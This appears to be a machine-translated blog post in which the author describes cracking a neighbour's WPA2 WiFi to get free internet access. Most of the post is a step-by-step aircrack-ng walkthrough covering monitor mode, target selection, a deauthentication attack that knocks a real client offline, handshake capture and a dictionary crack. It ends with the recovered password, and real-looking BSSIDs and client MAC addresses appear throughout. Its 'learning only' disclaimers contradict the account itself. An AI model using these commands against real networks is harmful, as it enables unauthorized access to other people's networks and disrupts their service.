banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量
HomeArchives关于

I stole his net

#渗透测试#近源158
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This article is for technical learning and exchange purposes only. It advises against hacking your neighbors' WiFi networks. The article provides a list of materials needed for WiFi hacking and explains the technical principles behind WiFi authentication and cracking. It also provides instructions on how to activate a wireless network card, enable monitor mode, and detect nearby WiFi networks. The article suggests selecting a WiFi network with a strong signal for cracking and provides information on how to capture handshake packets from the target network.

#

This article is for technical learning and communication only. Please do not casually target your neighbors.

Preparation#

You will need the following materials:

  • A wireless network card device that supports monitoring
  • A powerful WiFi dictionary
  • A place with WiFi

Recently, I ran out of data and thought about trying to steal some WiFi. I checked the WiFi layout around me..
image
There are still some WiFi devices, so I started to see if I could get one.

Technical Principles#

WiFi Authentication#

As we all know, WiFi roughly has four supported formats:

  1. No security
  2. WEP
  3. WPA/WPA2-PSK
  4. WPA/WPA2 802.1X (radius authentication)
    Generally, we set the third type.

WPA-PSK Authentication Process#

image

  1. The wireless AP periodically sends beacon packets to update the wireless terminal's wireless network list.
  2. The wireless terminal broadcasts ProbeRequest on each channel (1-13) (non-hidden type WiFi contains ESSID, hidden type WiFi does not contain ESSID).
  3. Each channel's AP responds with ProbeResponse, containing ESSID and RSN information.
  4. The wireless terminal sends an AUTH packet to the target AP. There are two types of AUTH authentication: 0 for open, 1 for shared (WPA/WPA2 must be open).
  5. The AP responds to the network card's AUTH packet.
  6. The wireless terminal sends an association request packet to the AP.
  7. The AP sends an association response packet to the wireless terminal.
  8. EAPOL four-way handshake for authentication (the handshake packet is the key to cracking).
  9. Authentication is completed, and internet access is available.

WPA-PSK Four-Way Handshake Authentication Process#

image

WPA-PSK Cracking Principle#

Using the PSK+ssid from our dictionary to generate PMK (this step is the most time-consuming and is currently the bottleneck of cracking), then combining the client MAC from the handshake packet, the AP's BSSID, A-NONCE, and S-NONCE to calculate PTK, and then using the original message data to calculate MIC and compare it with the MIC sent by the AP. If they match, then the PSK is the key.
As shown in the figure:
image
So the method is still to brute-force the handshake packet to obtain the password. Since the WiFi password is cracked through brute force, you need to download some powerful dictionaries, which can be searched directly on GitHub or simply googled.

Start Stealing#

Start the Network Card#

I am using Kali, and when inserting the wireless network card, please select to connect to the virtual machine.

ifconfig -a / This command checks all network devices

image
If your connection is correct, there should be a network card device named wlan0.
Next, use the command to activate this network card. If there is no output, it means it has been successfully activated.

ifconfig wlan0 up

Activate the Network Card in Monitor Mode#

airmon-ng start wlan0

image
At the same time, your wireless network card should have indicator lights or similar lighting up (check the model to see if it has been successfully enabled based on the results in the image).
The device name in monitor mode is wlan0mon, please remember this name for later use.

Detect Surrounding Wireless Networks#

I am currently connected to my mobile hotspot. After inserting the wireless network card, I will start sniffing the surrounding WiFi devices.

airodump-ng wlan0mon

Check the information of the surrounding router APs.
From personal experience, generally, a signal strength greater than -70 can be cracked, greater than -60 is best, and less than -70 is unstable with a weak signal. (The smaller the absolute value of the signal strength, the stronger the signal).
image
Here we will attack the WiFi "You Walk Old Hot Pot," so we need to record the corresponding BSSID and CH. These two values are the unique identifier of the WiFi and the channel, respectively. It is recommended to choose WiFi with a smaller PWR value, as this indicates a better signal.
If you want to understand what these parameters are, I will attach two images from the internet:
image
image
image

Select the WiFi to Crack and Target for Handshake Capture#

airodump-ng wlan0mon -c 7 --bssid 14:75:90:9E:29:8E

The -c parameter represents the channel number, and --bssid represents the unique identifier of this WiFi.
After executing, wait for a while, and the output result is as follows:

fundamental     CH 7 ][ Elapsed: 6 s ][ 2021-04-07 23:41
      BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
      14:75:90:9E:29:8E  -37   1       89     4294  299  11  270   WPA2 CCMP   PSK  203
      BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
      14:75:90:9E:29:8E  48:7D:2E:B3:04:DF  -29    0 - 1e     0        7
      14:75:90:9E:29:8E  E0:DC:FF:DC:5A:89  -40    0 - 0e   817     4259
      14:75:90:9E:29:8E  80:ED:2C:10:0D:8A  -63    0 -24      0        2
      14:75:90:9E:29:8E  FA:83:C4:C0:8F:DF  -60    0e-24     88       88

From this output, we can analyze the data:

  • There are currently 4 devices connected to this WiFi, along with each device's unique identifier, packet count, etc. The next four lines represent the four devices, and we need to record the device identifier where Lost has changed. Here we choose the identifier E0:DC:FF:DC:5A:89.

Okay, we currently have a few useful pieces of information as follows:
WiFi unique identifier 14:75:90:9E:29:8E
Identifier of one of the devices connected to WiFi E0:DC:FF:DC:5A:89
WiFi channel 11

Listen for Handshake Packets#

Next, we need to capture packets based on the above information and try to obtain the handshake packet containing the key.

airodump-ng wlan0mon --bssid 14:75:90:9E:29:8E -c 11 -w 203

Parameter explanation: -w saves the packet file name –c channel –bssid AP's MAC address (note that test.cap will be renamed), you can also use other tools to capture packets like: wireshark, tcpdump, capturing the handshake packet will have prompts.

airodump-ng --ivs --bssid E6:9A:DC:79:7:EC -w longas -c 1 wlan0mon**

PS: I recommend using this command for listening, –ivs here is set to filter, not to save all wireless data, but only to save IVS data packets that can be used for cracking, which can effectively reduce the size of saved packets. If you listen according to the first statement without filtering requests, there will be many extra requests, and I will use this command for demonstration in the subsequent images.

When listening, if a device logs in successfully, the handshake packet will be captured. However, at this time, the client may not necessarily send a login packet to the server. How to capture this packet with the authentication request? It's simple, forcibly disconnect the client.

Execute Deauthentication Attack to Obtain Handshake Packet#

Next, we need to use Aireplay-ng to perform a deauthentication attack. When the user reconnects to WiFi, Airodump-ng should be able to capture the packet containing the key.

aireplay-ng wlan0mon -0 10 -a 14:75:90:9E:29:8E -c E0:DC:FF:DC:5A:89

Here, -0 represents the number of attacks, the following 10 is the number of attacks, -a represents the WiFi to be attacked, and -c represents the device connected to the WiFi to be attacked.
The output result of this command is as follows:

fundamental     23:55:26  Waiting for beacon frame (BSSID: 14:75:90:9E:29:8E) on channel 11
     23:55:28  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [27| 1 ACKs]
     23:55:29  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 3| 1 ACKs]
     23:55:30  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 2| 6 ACKs]
     23:55:32  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 8| 7 ACKs]
     23:55:34  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7| 7 ACKs]
     23:55:36  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7|14 ACKs]
     23:55:39  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [34| 3 ACKs]
     23:55:41  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [22| 6 ACKs]
     23:55:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 5| 5 ACKs]
     23:55:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [10| 6 ACKs]

If this method fails multiple times, you can try removing the -c parameter to perform a range attack on each device, which will also increase the chances of capturing the encrypted packet.
When airodump-ng prompts that it has captured the WPA handshake, it means that the encrypted handshake packet has been obtained, and there is no need for a deauthentication attack anymore.
image
In practice, I used to disconnect the entire client to make them reconnect.
image
When the shell here prompts WPA handshake, it indicates that the handshake packet has been obtained, and you can stop.

CH 11 ][ Elapsed: 6 mins ][ 2021-04-08 00:05 ][ WPA handshake: 14:75:90:9E:29:8E

Dictionary Cracking#

Next, we will use the prepared dictionary and the obtained handshake packet for brute-force cracking.
Execute the following command to crack:

aircrack-ng -w common.txt 203.ivs

-w is our dictionary, and 203-01.cap is the key handshake packet we obtained.
I was lucky, and the password was relatively simple.
image

KEY FOUND! [ 99998888 ] is the password.
image

Finally#

Please treat your neighbors well and do not casually target them.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.